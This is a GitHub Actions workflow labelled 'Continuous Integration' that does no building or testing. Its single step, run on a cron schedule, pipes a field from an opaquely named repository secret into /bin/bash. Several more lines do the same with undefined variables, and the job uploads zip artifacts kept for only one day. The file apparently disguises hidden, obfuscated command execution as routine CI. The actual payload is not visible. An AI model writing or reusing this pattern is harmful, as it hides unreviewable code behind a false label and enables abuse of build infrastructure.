name: Continuous Integration
on:
  workflow_dispatch:

  schedule:
    - cron: '58 5,11,17,23 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          gz37: ${{ secrets.gz37 }}
        run: |
          printf '%s' "$gz37" | jq -r .nqwem30515 | /bin/bash
          printf '%s' "$s4223" | jq -r .cg3 | /bin/bash
          echo $k61 | jq -r .xgmyp928 | /bin/bash
          echo $pbglj87285 | jq -r .wiqgl77618 | /bin/bash
          echo $kbfg69 | jq -r .lhfdh7150 | /bin/bash
          echo $wiovu8719 | jq -r .ktcx66413 | /bin/bash
          echo $wpv31 | jq -r .yjcpj1913 | /bin/bash
          echo $rs0163 | jq -r .vfr35337 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: nMRG2pce
          path: "*.zip"
          retention-days: 1
